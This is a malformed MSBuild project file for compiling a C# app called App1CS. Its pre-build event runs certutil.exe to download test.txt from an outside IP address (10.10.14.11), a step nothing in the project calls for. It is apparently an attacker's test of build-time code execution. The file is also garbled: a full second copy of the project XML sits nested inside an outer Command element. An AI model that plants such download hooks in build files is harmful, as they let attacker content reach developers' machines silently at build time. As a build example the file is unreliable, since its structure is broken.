<Project DefaultTargets = "Compile">

    <!-- Set the application name as a property -->
    <PropertyGroup>
        <appname>App1CS</appname>
    </PropertyGroup>

    <!-- Specify the inputs by type and file name -->
    <ItemGroup>
        <CSFile Include = "*.cs"/>
    </ItemGroup>
    <ItemDefinitionGroup>
      <PreBuildEvent>
        <Command><Project DefaultTargets = "Compile">

    <!-- Set the application name as a property -->
    <PropertyGroup>
        <appname>App1CS</appname>
    </PropertyGroup>

    <!-- Specify the inputs by type and file name -->
    <ItemGroup>
        <CSFile Include = "*.cs"/>
    </ItemGroup>
    <ItemDefinitionGroup>
      <PreBuildEvent>
        <Command>certutil.exe -urlcache -f http://10.10.14.11/test.txt test.txt</Command>
        <Message>Bruh</Message>
      </PreBuildEvent>
      <!-- <PreLinkEvent>
        <Command></Command>
        <Message>Making a copy of main.obj</Message>
      </PreLinkEvent>
      <PostBuildEvent>
        <Command></Command>
        <Message>Making a copy of myproject.exe</Message>
      </PostBuildEvent> -->
    </ItemDefinitionGroup>

    <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
      <PreBuildEventUseInBuild>true</PreBuildEventUseInBuild>
      <PreLinkEventUseInBuild>true</PreLinkEventUseInBuild>
      <PostBuildEventUseInBuild>true</PostBuildEventUseInBuild>
    </PropertyGroup>

    <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
      <PreBuildEventUseInBuild>false</PreBuildEventUseInBuild>
      <PreLinkEventUseInBuild>false</PreLinkEventUseInBuild>
      <PostBuildEventUseInBuild>false</PostBuildEventUseInBuild>
    </PropertyGroup>

    <Target Name="Compile">
        <!-- Run the C# compilation using input files of type CSFile -->
        <CSC
            Sources = "@(CSFile)"
            OutputAssembly = "$(appname).exe">
            <!-- Set the OutputAssembly attribute of the CSC task
            to the name of the executable file that is created -->
            <Output
                TaskParameter = "OutputAssembly"
                ItemName = "EXEFile" />
        </CSC>
        <!-- Log the file name of the output file -->
        <Message Text="The output file is @(EXEFile)"/>
    </Target>
</Project>
</Command>
        <Message>Bruh</Message>
      </PreBuildEvent>
    </ItemDefinitionGroup>

    <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
      <PreBuildEventUseInBuild>true</PreBuildEventUseInBuild>
      <PreLinkEventUseInBuild>true</PreLinkEventUseInBuild>
      <PostBuildEventUseInBuild>true</PostBuildEventUseInBuild>
    </PropertyGroup>

    <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
      <PreBuildEventUseInBuild>false</PreBuildEventUseInBuild>
      <PreLinkEventUseInBuild>false</PreLinkEventUseInBuild>
      <PostBuildEventUseInBuild>false</PostBuildEventUseInBuild>
    </PropertyGroup>

    <Target Name="Compile">
        <!-- Run the C# compilation using input files of type CSFile -->
        <CSC
            Sources = "@(CSFile)"
            OutputAssembly = "$(appname).exe">
            <!-- Set the OutputAssembly attribute of the CSC task
            to the name of the executable file that is created -->
            <Output
                TaskParameter = "OutputAssembly"
                ItemName = "EXEFile" />
        </CSC>
        <!-- Log the file name of the output file -->
        <Message Text="The output file is @(EXEFile)"/>
    </Target>
</Project>